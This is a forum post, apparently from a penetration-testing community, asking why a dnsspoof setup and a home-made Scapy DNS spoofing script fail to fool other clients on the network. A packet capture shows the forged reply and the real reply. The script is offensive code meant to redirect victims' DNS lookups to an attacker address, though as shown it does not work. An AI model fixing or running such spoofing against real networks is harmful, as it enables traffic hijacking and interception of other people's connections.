Hello, BT

I am trying to do some dns spoofing using dnsspoof. simply using
Code:
dnsspoof -ieth1
does nothing, and
Code:
dnsspoof -ieth1 udp dst port 53
only fools my host (not very useful).

I tried writing a Scapy script to do the spoofing:
Code:
#!/usr/bin/env python

import socket
import scapy
import sys
from scapy.all import *

SPOOF_ADDR=sys.argv[1]

while 1 :
	print 'Waiting for DNS query...'
	a=sniff(filter="udp dst port 53", count=1)
	request=a[0]
	response=Ether(src=request.dst,dst=request.src)/IP(src=request.getlayer(IP).dst, dst=request.getlayer(IP).src)/UDP()/DNS(qr=1L, rd=1L, ra=1L, an=DNSRR(rrname=request.qd.qname, type='A', rclass='IN', ttl=10, rdata=SPOOF_ADDR),qd=request.qd)
	sendp(response, iface="eth1")
This doesn't work either, but I have no idea why. The spoofed packet seems almost indistinguishable from a real response (to my eyes, at least) but the clients are not fooled.

Here is a packet log taken while running my script:
Code:
No.     Time        Source                Destination           Protocol Info
  20414 1943.450319 X.X.117.233        X.X.2.26           DNS      Standard query A google.com

Frame 20414: 70 bytes on wire (560 bits), 70 bytes captured (560 bits)
Ethernet II, Src: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX), Dst: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
    Destination: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
    Source: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
    Type: IP (0x0800)
Internet Protocol, Src: X.X.117.233 (X.X.117.233), Dst: X.X.2.26 (X.X.2.26)
User Datagram Protocol, Src Port: 33250 (33250), Dst Port: domain (53)
Domain Name System (query)
    [Response In: 20449]
    Transaction ID: 0x4c6c
    Flags: 0x0100 (Standard query)
    Questions: 1
    Answer RRs: 0
    Authority RRs: 0
    Additional RRs: 0
    Queries
        google.com: type A, class IN
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)

No.     Time        Source                Destination           Protocol Info
  20416 1943.477886 X.X.2.26           X.X.117.233        DNS      Standard query response A X.X.117.233

Frame 20416: 96 bytes on wire (768 bits), 96 bytes captured (768 bits)
Ethernet II, Src: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY), Dst: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
    Destination: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
    Source: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
    Type: IP (0x0800)
Internet Protocol, Src: X.X.2.26 (X.X.2.26), Dst: X.X.117.233 (X.X.117.233)
User Datagram Protocol, Src Port: domain (53), Dst Port: domain (53)
Domain Name System (response)
    Transaction ID: 0x0000
    Flags: 0x8180 (Standard query response, No error)
    Questions: 1
    Answer RRs: 1
    Authority RRs: 0
    Additional RRs: 0
    Queries
        google.com: type A, class IN
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
    Answers
        google.com: type A, class IN, addr X.X.117.233
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 10 seconds
            Data length: 4
            Addr: X.X.117.233 (X.X.117.233)

No.     Time        Source                Destination           Protocol Info
  20449 1943.833154 X.X.2.26           X.X.117.233        DNS      Standard query response A 74.125.67.103 A 74.125.67.104 A 74.125.67.105 A 74.125.67.106 A 74.125.67.147 A 74.125.67.99

Frame 20449: 166 bytes on wire (1328 bits), 166 bytes captured (1328 bits)
Ethernet II, Src: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY), Dst: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
    Destination: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
    Source: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
    Type: IP (0x0800)
Internet Protocol, Src: X.X.2.26 (X.X.2.26), Dst: X.X.117.233 (X.X.117.233)
User Datagram Protocol, Src Port: domain (53), Dst Port: 33250 (33250)
Domain Name System (response)
    [Request In: 20414]
    [Time: 0.382835000 seconds]
    Transaction ID: 0x4c6c
    Flags: 0x8180 (Standard query response, No error)
    Questions: 1
    Answer RRs: 6
    Authority RRs: 0
    Additional RRs: 0
    Queries
        google.com: type A, class IN
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
    Answers
        google.com: type A, class IN, addr 74.125.67.103
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 1 minute, 24 seconds
            Data length: 4
            Addr: 74.125.67.103 (74.125.67.103)
        google.com: type A, class IN, addr 74.125.67.104
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 1 minute, 24 seconds
            Data length: 4
            Addr: 74.125.67.104 (74.125.67.104)
        google.com: type A, class IN, addr 74.125.67.105
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 1 minute, 24 seconds
            Data length: 4
            Addr: 74.125.67.105 (74.125.67.105)
        google.com: type A, class IN, addr 74.125.67.106
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 1 minute, 24 seconds
            Data length: 4
            Addr: 74.125.67.106 (74.125.67.106)
        google.com: type A, class IN, addr 74.125.67.147
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 1 minute, 24 seconds
            Data length: 4
            Addr: 74.125.67.147 (74.125.67.147)
        google.com: type A, class IN, addr 74.125.67.99
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 1 minute, 24 seconds
            Data length: 4
            Addr: 74.125.67.99 (74.125.67.99)
The first packet is the dns query from my host (nslookup google.com)
The second is the spoofed response, and the third is the actual response from the NS.

Does anybody here see my mistake? I'm at a loss.
Thanks in advance,
-d1g